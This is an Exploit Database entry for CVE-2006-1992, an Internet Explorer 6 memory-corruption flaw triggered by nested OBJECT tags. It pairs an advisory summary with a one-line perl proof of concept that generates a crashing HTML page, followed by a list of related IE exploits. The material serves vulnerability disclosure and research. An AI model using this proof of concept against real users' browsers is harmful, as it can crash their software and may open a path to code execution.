Exploit Database - Logo

Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption

EDB-ID: 27727 Author: Michal Zalewski Published: 2006-04-22
CVE: CVE-2006-1992 Type: Dos Platform: Windows
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/17658/info

Microsoft Internet Explorer is prone to a memory-corruption vulnerability. This issue is due to a flaw in the application in handling nested OBJECT tags in HTML content.

An attacker could exploit this issue via a malicious web page to potentially execute arbitrary code in the context of the currently logged-in user, but this has not been confirmed. Exploit attempts likely result in crashing the affected application. Attackers could exploit this issue through HTML email/newsgroup postings or through other applications that employ the affected component.

Microsoft Internet Explorer 6 for Microsoft Windows XP SP2 is reportedly vulnerable to this issue; other versions may also be affected.

perl -e '{print "<STYLE></STYLE>\n<OBJECT>\nBork\n"x32}' >test.html
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2006-1992
Trying to match OSVDBs (1): 24966
Other Possible E-DB Search Terms: Microsoft Internet Explorer 6,  Microsoft Internet Explorer
Date D V Title Author
2006-09-21 Verified Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer OverflowTrirat Putt...
2005-01-12 Verified Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)Skylined
2006-03-23 Verified Microsoft Internet Explorer - 'createTextRang' Download Shellcode (1)ATmaCA
2005-03-09 Verified Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer OverflowArabteam2000
2006-09-20 Verified Microsoft Internet Explorer - 'VML' Remote Buffer Overflownop
2010-01-22 Verified Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Code Execution (Add Admin)Stack
2010-01-16 Verified Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Executiongermaya_x &...
2005-04-12 Verified Microsoft Internet Explorer - DHTML Object Memory CorruptionSkylined
2005-05-31 Verified Microsoft Internet Explorer - JavaScript 'window()' CrashBenjamin Franz
2009-01-09 Verified Microsoft Internet Explorer - JavaScript screen[ ] Denial of ServiceSkylined
2006-08-21 Verified Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service Vulnerabilitiesnop
2005-05-31 Verified Microsoft Internet Explorer - Multiple Stack Overflows CrashsBenjamin Franz
2004-12-28 Verified Microsoft Internet Explorer - Remote Code ExecutionShredderSub7
2010-09-20 Verified Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)Metasploit
2006-09-19 Verified Microsoft Internet Explorer - VML Remote Denial of Service (PoC)Shirkdog
2008-12-28 Verified Microsoft Internet Explorer - XML Parsing Buffer Overflow (2)Jeremy Brown
2005-07-15 Verified Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)Edward Gagnon
2004-12-21 Verified Microsoft Internet Explorer / MSN - Memory_Access_Violation Denial of ServiceEmmanouel K...
2017-05-03 Waiting verification Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-FreeMarcin Ressel
2015-06-08 Verified Microsoft Internet Explorer 11 - Crash (PoC) (2)Pawel Wylecial
2014-11-10 Verified Microsoft Internet Explorer 11 - Denial of ServiceBehrooz Abb...
2016-11-28 Waiting verification Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type ConfusionSkylined
2016-11-02 Waiting verification Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-FreeSkylined
2016-04-15 Waiting verification Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-FreeMarcin Ressel
2015-12-09 Waiting verification Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTRMarcin Ressel
Menu